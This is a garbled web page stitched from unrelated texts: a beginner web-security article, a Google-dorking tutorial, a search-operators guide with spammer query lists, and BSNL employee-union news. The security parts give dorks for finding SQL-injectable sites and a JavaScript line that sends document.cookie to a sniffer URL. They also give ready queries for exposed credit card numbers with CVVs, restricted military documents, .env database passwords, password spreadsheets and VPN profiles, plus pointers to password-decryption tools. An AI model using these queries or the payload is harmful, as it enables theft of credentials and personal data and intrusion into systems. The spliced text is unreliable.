I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

Many novice developers are so addicted to writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL query, XXS. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can they be avoided?

SQL injection

SQL injection is the most common type of database attack that is carried out with a SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.

An SQL injection type attack is possible due to incorrect processing of input data used in SQL queries. With a successful attack by a hacker, you run the risk of losing not only the contents of the databases, but also the passwords and logs of the administrative panel, respectively. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on which DBMS is used and how the scenario itself is implemented. There are a lot of vulnerable sites for SQL injections in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests for finding vulnerable sites. Here is some of them:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

How to use them? It is enough to enter them into Google search engine or Yandex. The search engine will give you not just a vulnerable site, but also a page for this vulnerability. But we will not stop there and make sure that the page is really vulnerable. For this, it is enough to put a single quote “‘” after the value “id=1”. Something like this:

• inurl:games.php?id=1'

And the site will give us an error about the SQL query. What does our hacker need next?

And then he needs this very link to the page with an error. Then work on the vulnerability in most cases takes place in the distribution kit "Kali linux" with its utilities for this part: the introduction of the injection code and the performance of the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

XSS Attack

This type of attack is carried out on cookies. They, in turn, are very fond of saving users. Why not? How without them? After all, thanks to Cookies, we do not drive in a password from Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To implement an XSS attack, our hacker needs JavaScript knowledge. The language at first glance is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

A hacker can add JS code to some forum or guestbook:

Scripts redirect us to an infected page where the code will be executed: be it a sniffer, some kind of storage or an exploit that will somehow steal our Cookies from the cache.

Why JavaScript? Because JavaScript is great with web requests and has access to cookies. But if our script will transfer us to some site, then the user will easily notice this. Here, the hacker uses a more cunning option - he simply enters the code into the picture.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? Very simple - do not follow suspicious links.

DoS and DDos Attacks

DoS (from the English Denial of Service - denial of service is a hacker attack on a computer system with the aim of bringing it to failure. This is the creation of such conditions under which conscientious users of the system cannot access the provided system resources (servers), or this access is difficult. A system failure can also be a step towards its capture, if in an emergency the software gives out any critical information: for example, version, part program code etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid the attack significantly hit the "target" in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow you to bring almost any system to failure without leaving legally significant evidence.

What is the difference between DoS and DDos attacks?

DoS is an attack built in a smart way. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request that will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can easily cope with such an overload.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there may very well be hundreds or more of them. Even heavy-duty servers may not be able to cope with such an overload. I'll give you an example.

A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts screaming loudly. Talking is either impossible or very difficult. Solution: call security, which will calm and take the person out of the room. DDoS attacks are when thousands of such ill-mannered people run in. In this case, the guards will not be able to twist and take everyone away.

DoS and DDoS are produced from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is involved in the attack of any server.

How to protect yourself from this? In general, no way. But you can complicate the task of a hacker. To do this, you need to choose a good hosting with powerful servers.

Brute force attack

A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will just put a password on the admin panel, he can forget about one thing. Password!

It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and not complex attack - Brute Force.

Brute force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, sorting by numbers, let's say up to some range, mixed (Latin + numbers), and there are even dictionaries with unique symbols @#4$%&*~~`'”\ ? etc.

Of course, this type of attack is easy to avoid. It is enough to come up with a complex password. Even captcha can save you. And also, if your site is made on CMS, then many of them calculate a similar type of attack and block ip. We must always remember that the more different characters in the password, the harder it is to pick it up.

How do hackers work? In most cases, they either suspect or already know part of the password. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacks. Basically, hackers take a range of 5 to 10 characters and add a few characters there that they probably know in advance. Next, generate passwords with the desired ranges. The Kali linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the enumeration speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But not only sites are subjected to brute force.

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or overlook somewhere. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!

Receiving private data does not always mean hacking - sometimes it is published in the public domain. Knowing the Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING

All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Everything is connected to the Internet today, caring little about restricting access. Therefore, many private data become the prey of search engines. Spider robots are no longer limited to web pages, but index all content available on the Web and constantly add confidential information to their databases. Learning these secrets is easy - you just need to know how to ask about them.

Looking for files

In capable hands, Google will quickly find everything that is bad on the Web, such as personal information and files for official use. They are often hidden like a key under a rug: there are no real access restrictions, the data just lies in the back of the site, where links do not lead. The standard Google web interface provides only basic advanced search settings, but even these will be enough.

There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext . The first sets the format that the search engine determined by the file header, the second - the file extension, regardless of its internal content. When searching in both cases, you need to specify only the extension. Initially, the ext operator was convenient to use in cases where there were no specific format characteristics for the file (for example, to search for ini and cfg configuration files, inside of which anything can be). Now Google's algorithms have changed, and there is no visible difference between the operators - the results are the same in most cases.

Filtering the output

By default, Google searches for words and in general for any characters entered in all files on indexed pages. You can limit the search scope by the top-level domain, a specific site, or by the location of the desired sequence in the files themselves. For the first two options, the site statement is used, followed by the name of the domain or the selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the specified in the body of the links themselves, allinanchor - in the text provided with the tag , allintitle - in the page headers, allintext - in the body of the pages.

For each operator there is a lighter version with a shorter name (without the prefix all). The difference is that allinurl will find links with all words, while inurl will only find links with the first of them. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another similar in meaning - site . The first one also allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes, which will expire only after two years (or when their owners get tired of feeding everyone in a row).

Allintext: card number expiration date /2017 cvv

When you read on the news that a young hacker "hacked into the servers" of the Pentagon or NASA, stealing classified information, then in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list is in electronic form. For convenience or due to an oversight, it can also lie on the organization's website itself. It is logical that in this case there will be no references to it, since it is intended for internal use. What words can be in such a file? At least - the field "address". It is easy to test all these assumptions.

inurl:nasa.gov filetype:xlsx "address"

We use bureaucracy

Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google Webmaster Operators, the Web itself, and the structure of what you're looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need in order to get really valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces typical formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.

For example, the Distribution statement stamp, which is mandatory in the office of the US Department of Defense, means standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B - intended for internal use only, C - strictly confidential, and so on up to F. Separately, there is the letter X, which marks especially valuable information that represents a state secret of the highest level. Let those who are supposed to do it on duty look for such documents, and we will limit ourselves to files with the letter C. According to DoDI 5230.24, such marking is assigned to documents containing a description of critical technologies that fall under export control. You can find such carefully guarded information on sites in the .mil top-level domain allocated to the US Army.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that only sites from the US Department of Defense and its contract organizations are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound like botanical (PP "Kiparis", self-propelled guns "Acacia") or even fabulous (TOS "Pinocchio").

By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is removed from official sites, where it once appeared, so if you can’t follow an interesting link in the search results, use the Google cache (cache operator) or the Internet Archive website.

We climb into the clouds

In addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other data storage services that create "private" links to publicly published data occasionally pop up in the Google cache. It's even worse with alternative and self-made services. For example, the following query finds the data of all Verizon clients that have an FTP server installed and actively using a router on their router.

Allinurl:ftp://verizon.net

There are now more than forty thousand such smart people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file download. All the content of such media is indexed by Google and other search engines, so you can access files stored on external drives via a direct link.

Peeping configs

Before the wholesale migration to the clouds, simple FTP servers, which also lacked vulnerabilities, ruled as remote storages. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read because all entries are stored in plain text and passwords are encrypted using the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.

When talking about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, you can easily indicate keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them like this:

"pwd=" "UID=" ext:inc

We reveal passwords from the DBMS

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and instead of passwords, their MD5 hashes are recorded. Decrypting them, strictly speaking, is impossible, but you can find a match among known hash-password pairs.

Until now, there are DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.

Intext:DB_PASSWORD filetype:env

With the appearance on the servers windows place configuration files partly occupied the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

Filetype:reg HKEY_CURRENT_USER "Password"=

Don't Forget the Obvious

Sometimes it is possible to get to classified information with the help of data accidentally opened and caught by Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.

Filetype:xls inurl:password

On the one hand, there are many means to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch CMS, do not use left scripts and close other holes. There is also a file with a robots.txt exclusion list, which prohibits search engines from indexing the files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, then it immediately becomes clear what they are trying to hide on it.

The list of directories and files on any site is preceded by the standard inscription index of. Since it must appear in the title for service purposes, it makes sense to limit its search to the intitle operator. Interesting stuff can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.

Follow the updates

Relevance is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request url) and the "real time" filter (&tbs=qdr:1).

The time interval of the last file update date from Google is also implicitly indicated. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

By type address bar one can only guess about a way to limit the output of results using the construction &tbs=qdr: . The letter y after it specifies a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the past day, h for the last hour, n for the minute, and s for the give me a sec. The most recent results just made known to Google are found using the &tbs=qdr:1 filter.

If you need to write a tricky script, it will be useful to know that the date range is set in Google in Julian format through the daterange operator. For example, this is how you can find the list PDF documents with the word confidential uploaded from January 1 to July 1, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is specified in Julian date format without decimals. It is inconvenient to translate them manually from the Gregorian calendar. It's easier to use a date converter.

Targeting and filtering again

In addition to specifying additional operators in the search query, they can be sent directly in the link body. For example, the filetype:pdf trait corresponds to the as_filetype=pdf construct. Thus, it is convenient to set any clarifications. Let's say that the output of results only from the Republic of Honduras is set by adding the construction cr=countryHN to the search URL, but only from the city of Bobruisk - gcs=Bobruisk . See the developer section for a complete list of .

Google's automation tools are designed to make life easier, but often add to the hassle. For example, a user's city is determined by the user's IP through WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same query, different results will get to the first page, and some of them may turn out to be completely hidden. Feel like a cosmopolitan and search for information from any country will help its two-letter code after the directive gl=country . For example, the code for the Netherlands is NL, while the Vatican and North Korea do not have their own code in Google.

Often search results are littered even after using a few advanced filters. In this case, it is easy to refine the query by adding a few exception words to it (each of them is preceded by a minus sign). For example, banking , names , and tutorial are often used with the word Personal. Therefore, cleaner search results will show not a textbook example of a query, but a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

Last Example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but either expensive or temporary and with restrictions. Signing up for yourself alone is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles . One request, and you join, for example, the friendly staff of the University of Bonn.

Filetype:pcf vpn OR Group

INFO

Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.

At Google help hundreds of different types of attacks and penetration tests are performed. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you're looking for makes it much easier to get the information you need (especially the information you didn't intend to make public). Not only Shodan feeds interesting ideas, but any database of indexed network resources!

How to search using google.com

Everyone probably knows how to use this search engine, like Google =) But not everyone knows that if you correctly compose a search query using special structures, you can achieve the results of what you are looking for much more efficiently and faster =) In this article I will try to show what and how you need to do in order to search correctly

Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators modify the search, or even tell Google to do completely different types of searches. For example, the design link: is a special operator, and the query link: www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
alternative request types

cache: If you include other words in the query, Google will highlight those included words within the cached document.
For example, cache:www.web site will show cached content with the word "web" highlighted.

link: the above search query will show web pages that contain links to the specified query.
For example: link:www.website will display all pages that have a link to http://www.site

related: Displays web pages that are "related" to the specified web page.
For example, related: www.google.com will list web pages that are similar to the Google home page.

info: Request Information: will provide some information that Google has about the requested web page.
For example, info:website will show information about our forum =) (Armada - Forum of adult webmasters).

Other information requests

define: The define: query will provide a definition of the words you type after this, compiled from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks: Google will process the rest of the query terms as stock tickers, and link to a page showing the prepared information for those characters.
For example, stocks: intel yahoo will show information about Intel and Yahoo. (Note that you must print breaking news characters, not the company name)

Request Modifiers

site: If you include site: in your query, Google will limit the results to the websites it finds in that domain.
You can also search for individual zones, such as ru, org, com, etc ( site:com site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results with all the query words in the title.
For example, allintitle: google search will return all Google search pages like images, Blog, etc

title: If you include intitle: in your query, Google will restrict results to documents containing that word in the title.
For example, title:Business

allinurl: If you run a query with allinurl: Google will limit the results with all the query words in the URL.
For example, allinurl: google search will return documents with google and search in the title. Also, as an option, you can separate words with a slash (/) then the words on both sides of the slash will be searched within the same page: Example allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:website

intext: searches only in the text of the page for the specified word, ignoring the title and texts of links, and other things not related to. There is also a derivative of this modifier - allintext: those. further, all words in the query will be searched only in the text, which is also important, ignoring frequently used words in links
For example, intext:forum

daterange: searches in time frames (daterange:2452389-2452389), dates for time are specified in Julian format.

Well, and all sorts of interesting examples of requests

Examples of compiling queries for Google. For spammers

inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post "Post Comment" "URL"

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Magazines

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Guest book"

Blogs

Inurl:blogger.com/comment.g?”postID”"anonymous"

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Forums

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php?”

Messages updated during the month of Jan 2020

16-01-2020

Condolence message

SNEA Expresses Deep Sorrow for the Demise of

Veteran leader

Com K. Viswanathan

CHQ Treasurer of JETA/JTOA (3 Times)

19/11, D block Nandhini flats church road, Chrompet Chennai 44,

 

15-01-2020

15-01-2020

15-01-2020

A Vital Breakthrough for Triple Play FTTH service through BSNL:

Open policy for provision of IPTV: The much awaited Policy for Provision of IPTV services through BSNL FTTH by content providers/partners have been issued by BSNL CO.

This venture is touted as BSNLs answer to major Private Players providing Triple Play Services--

By this project, BSNL is going to provide Real Triple Play Service to customers because here Watching TV is not going to consume Internet Data.

This is going to be one major Lifeline for BSNL revival.

This Venture has already been successfully developed and implemented privately by an LCO/TIP in Thrissur BA in Kerala Circle with the technical support of BSNL in house talents led by Com Anoop K J, JTO OMCR, Ernakulam.

They have devised an App to make/receive landphone calls using mobile phone using WiFi.

This project was presented in the recently held CWC Meet of SNEA at Bangalore in Augusts, 2019.

Various Proposals have been received from different Circles for the implementation of IPTV through BSNL Network.

The absence of IPTV (or TV service) has been identified as one of the major reasons for the lacklustre response to BSNL FTTH connections from multi operator LCOs across the country.

SNEA have been pursuing the project in all levels and we are happy to see light at the end of the tunnel.

We congratulate in the in-house talents in BSNL who showcased their real potential.

SNEA thank all officers who have been working for the implementation of the project in BSNL CO and all Circle Offices and particularly Com. P Padmanabha Rao, our AGS & DGM, BSNL CO.

IPTV Open Policy  

15-01-2020

Organizational Restructuring: Merger of Non-Territorial Circles.

Maintenance and Project Circles merged and renamed as Core Network-Transmission (East/West/North/South). Separate Circle for North East namely Core Network-Transmission NE Region covering AS, NE I and NE II Circles. Effective from 04/01/2020.

Telecom Factories merged with respective Territorial Circles as BA head w.e.f 02/01/2020.

NCNGN Circle merged with BBNW Circle.

Nodal Center Chandigarh merged with Punjab Circle.

Only one Training Circle with HQ at ALTTC, Gaziabad. ALTTC, NATFM and BRBRAITT will function as BA Heads. Only zonal RTTCs in the future.

Cover letter   Annexure

15-01-2020

 

14-01-2020

GS writes to Shri P K Purwar, CMD/BSNL:

Kindly take immediate action for Regular promotion instead of Look after arrangement in different Grades from among the Executives already working in higher scales by mere design change to fill up the huge vacuum created in the field units by VRS 2019 and for motivating the Executives to take extra work load:

As per the data available, on 02/01/2020,

i) Only 57 DGM(T) will be available against the sanctioned strength of 1481.

ii) Only 32 DGM(Fin) will be available against the sanctioned strength of 402.

iii) Only 1746 AGM(T) will be available in BSNL instead of 6500 AGMs working one year back. On DGM promotion, the number of AGMs will be about 1200, less than 20%. SDEs with 15 years of service are waiting for promotion.

iv) Only 70 CAOs will be available against the sanctioned strength of 1347. They will not be sufficient even to man the vacant DGM(Fin) posts.

v) Thousands of Executives in higher scales are working in JTO, SDE equivalent grades for 5 to 30 years and waiting for the promotion. JTOs recruited from 1988 are waiting for promotion in Arch wing. Thousands of JTOs from 1999, 2001 to 2008, 2010, 2013 etc batches are waiting for their first promotion. JTO(Civil/Elect/TF) wing status is equally bad.

We totally object to the prevalent look after arrangement being followed by the management instead of regular promotion. The Executives are already working in higher scales and they may be promoted to higher grades on a regular basis just by designation change, instead of LA arrangement.

GS letter to CMD  

11-01-2020

Meeting with Shri Arvind Vadnerkar, DIR(HR) on 01/09/2020: GS, President and both AGSs met DIR(HR) in the presence of Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) and GMs(Pers) and held discussions on the following issues:

Staffing norms and Restructuring of BSNL: We explained the temporary staffing norm issued by Restg cell is not at all workable as the field realities are not considered by the management. By the temp norms, some SSAs headed by GMs today has to be headed by an SDE in the future. There will be a large number of small SSAs with huge geographical areas where only one or two Executives will be justified. Practically it will be impossible to maintain the services in those areas. By outsourcing, the role and responsibility of Executives will not come down especially in CFA segment. In Rural areas, clubbing all the works of Transmission, BTS mtce, EB, Cable maintenance with SDE(Group) with vast areas will defeat the very purpose. Similarly, urban areas norms are also stringent. So the temporary norms are to be reworked immediately. Otherwise nobody will come forward to work in the external plant and Trans mtce and those who are working also will request for posting in Indoor, mobile etc. Similarly, substitutes are not marked in many SSAs for a smooth takeover on 01/31/2020. Director and GM(Restg) explained that it is only temporary norms which can be reviewed. We requested to review immediately.

We further explained the demand from the field units that maintenance of Primary Cable should also be included in the tender for outsourcing. Among the available TTs, very few have knowledge of cable jointing and they are not sufficient to maintain all the Primary Cables. Others are required for Indoor/MDF/Power Plant maintenance. These facts are explained in the meeting with DIR(CFA) but no favorable decisions come out so far. DIR(HR) assured to bring this important issue to the notice of DIR(CFA) again.

Promotions in the post VRS scenario and the need for Regular Promotion instead of Lookafter arrangement: We strongly protested against the move for giving Look after arrangement instead of Regular promotion. Almost DGM(T/Fin) positions and AGM/CAO/EE grades will become vacant after the VRS on 01/31/2020 and immediate action is to be taken for promotion, we demanded. Since large numbers of Executives with sufficient experiences are working in higher scales, they can be simply given promotion by designation change, we pointed out. Similarly thousands of JTOs in different wings are already in higher scales and can be given promotion by re-designation. Even DPC is not required. LA arrangement is against the interest of the Executives as they lose the service and future promotional avenues. Management is making LA years together and denying regular promotions. We demanded stopping of this mechanism and provide regular promotions for all the eligible Executives.

on DGM promotions,SNEA explained the meeting with Secretary, DoT on 01/01/2020 and his positive decision allowing DGM promotions. Even DoT given promotion to Sr DDG (CGM) level on 12/30/2019 for those retiring on 12/31/2019 but BSNL is not taking any action to give promotion to the vacant posts before their retirement. After discussion, DIR(HR) assured to discuss with Secretary/DoT and CMD/BSNL and do the needful for DGM promotions.

Reversion of 2001 Rect JTOs passed the LDCE -2007: Again discussion held on the matter and Assn explained their eligibility with reference to the SDE RR clause 12, note 5 and the clarifications issued in 2007 regarding their eligibility to appear in the LDCE-2007. Now some of them are reverted on the basis of the clarifications issued in 2012 for the LDCE 2010. The clarifications issued regarding eligibility for appearing in LDCE 2007 and LDCE 2010 are entirely different and that made the issue complicated. The eligibility has to be decided based on the clarifications issued for LDCE 2007, we demanded. Since they already become SDEs, they could not write the subsequent DCE held in 2012 and 2015. Among them also, some SDEs of TN Circle facing reversion while others are served only show cause notice. We demanded to stop the reversion process till the matter is decided based on the facts placed before the management. We suggested to form a Committee to examine the matter. Finally DIR(HR) directed the concerned Officers to bring all the related files the next day itself for taking an appropriate decision.

 

10-01-2020

10-01-2020

10-01-2020

Meeting with Shri P. K. Purwar, CMD BSNL on 10.01.2020: General Secretaries and AGSs of AIBSNLEA and SNEA met CMD BSNL today and had the discussions on the following issues:

DGM(T) Promotions:Regarding promotions from DET to DGM (T), we explained about the meeting with Secretary (T) DoT on 01st Jan., and 03rd Jan., 2020 in which Secretary (T) agreed for the promotions for DGM (T) provided it is not creating any Additional Financial Implications. CMD BSNL informed that he had also discussed with Secretary (T) in this regard and trying to do the needful.

Clearing of pending dues of recoveries from the Salary of the employees: CMD informed that the payment of the GPF recoveries in respect of VRS optees, about Rs.710 Crore will be released on Monday. Other dues will also be cleared at the earliest.

Promotions to fill up vacant posts after VRS: Regarding Promotions, CMD is of the opinion that employees should forget promotions for at least one year and work hard for the Revival of BSNL. Also opined that more merit is to be introduced in promotions in the future. We explained the ground realities. Almost all DGM posts in Telecom & Finance Wings as well as AGM & CAOs posts will become vacant after 01/31/2020 and it will become difficult to run BSNL thereafter without filling up these vacant posts on an immediate basis. There is stagnation in the Cadres of JTO and SDE and their promotions cannot be delayed. At the time of recruitment of JTOs & JAOs as well as in promotions from JTO to SDE, the competitive examination is available and practically 50% Executives eligible at the time of promotion are from competitive quota only, we explained. CMD BSNL agreed about the shortage in AGM, CAO and DGM posts after post-VRS 2019.

Farewell to the retiring employees: On recognition of the services of the retirees, we requested to restore the amount of Rs 3001/- as it is just a token of appreciation of their past services in BSNL and honor for them. CMD informed his inability due to the cash crunch in BSNL. In that case, we suggested some alternative arrangement like recharge coupons equal to that amount. CMD appreciated our suggestion and agreed to look into the alternative instead of Cash Award.

Allotment of USOF Projects to BSNL on Nomination Basis: We appraised CMD BSNL regarding the allotment of USOF Projects to BSNL on Nomination Basis. CMD BSNL mentioned that we have to do all the Govt. Projects/ USOF Projects and our performance during previous years was very good and we have completed the Govt. Projects within the time frame. However, we feel that if it is given on Nomination Basis, it will be good for BSNL otherwise if we compete through tender, it may not be beneficial for BSNL.

Maintenance of Primary Cables: We further appraised CMD about the difficulties faced by the Executives and various Circles in Post-VRS Scenario in maintaining the Primary Cables since the orders for maintenance of Primary Cable for outsourcing has not been issued by the Corporate Office. CMD BSNL mentioned that due to the developmental works going on in various States, the Primary Cable has to be replaced/ maintained frequently by taking the permission from various Local State Govt. Bodies/ Highway Authorities for which the Tenderer may not come forward and our maintenance work will be suffered badly.

Maintenance of MDF:We pleaded with the CMD BSNL that the control of MDF should be within BSNL Staff. CMD BSNL mentioned that our young staff should come forward, grab the important works and take responsibility. CMD further mentioned that due to shortage of staff in post VRS scenario it may not be possible to maintain MDF round the clock by the BSNL Staff. After detailed discussion, CMD assure to review the situation after three months.

 

08-01-2020

08-01-2020

SNEA extends solidarity and moral support to the General Strike by the Central Trade Unions on 01/08/2020 against Privatization of Public Sector and other demands

 

07-01-2020

07-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec(East) addressed the extended CEC meeting. CHQ leaders recollected the contribution of the senior leaders and the activists taken the VRS. They lead the Association during various struggles for settlement of different demands and their contribution will be remembered for ever. All the dues will be settled by 31.01.2020 and their parting with BSNL will be smooth.

Ultimately our struggle for years together brought good results for BSNL. Management and Govt tried to suppress our struggle by many means, by pay cuts, charge sheets, show cause notices etc etc but we never compromised. Finally our struggle brought out 4G spectrum free of cost as we demanded, land monetization approved, entire expenditure of VRS borne by the Govt, 8500 Cr bond with sovereign guarantee approved to give financial support etc.

Our main focus is on revival of BSNL. 4G launching is planned for 03/01/2020. The tariff is increasing which is a good sign for the industry and BSNL. If management is able to implement a good mechanism taking the employees into confidence, Revival is very much possible. Everything depends on the management.

At Corporate level, BSNL restructuring is going on. In the changed scenario, guidelines are issued for outsourcing of CFA work. However we are afraid that due to the stringent conditions, it may fail in many places and BSNL will be in big trouble in maintaining the services after 02/01/2020, we informed the management. The experienced laborers may not be able to participate in the tender. Similar work is going on in other verticals also.

As we are afraid, in HR vertical, the number of posts is coming down drastically by restructuring. VRS thrown various challenges and post reduction and promotion is one among them. The threat of post reduction was there for many years and in anticipation of that, the Association worked out a non-post based promotion policy well in advance. Now our entire focus is for its early implementation w.e.f the due date of 07/01/2018.

Unfortunately, some Executive Assn is still demanding post based promotion from a prospective date(for few vacancies) and helping the management to stop the implementation of the new promotion policy. Management is not giving post based promotion in the name of contempt and restructuring and at the same time not implementing the new policy. All are eligible for promotion from 07/01/18 itself but they are insisting for promotion from a prospective date! The opportunity we got last year for SDE promotion for all the SDE posts spoiled by them by the adamant attitude on contempt petition and the demand for personal appearance of CMD and GM(Pers) in the CAT/Ernakulam.

The new promotion will benefit all the Executives, ensuring a smooth career progression upto AGM Grade. All the JTOs upto 2014 can become SDEs and all the SDEs upto 2016 can become Sr SDE/Sr AO or AGM/CAO as of now. Past service weightage is provided in the new policy. By that, promotion from SDE/AO to Sr SDE/Sr AO Grade will be in 3 years and SDE/AO to AGM/CAO promotion in 8 years which cannot be dreamed in the changed scenario. After VRS, the number of posts in all the cadres will come down drastically.

By sustained struggle and continuous persuasion, we could settle many issues in the past. In 2018 we could give record number of promotions, never heard in the history of BSNL or DoT. Specific issues of the BSNL direct rect employees like i) EPF contribution without the ceiling, ii) 5% Superannuation benefit etc could settle. We will continue our efforts to resolve the remaining issues with the support of all.

 

06-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec(East) attended and addressed the meeting. The CEC unanimously co-opted the following Circle Office bearers:

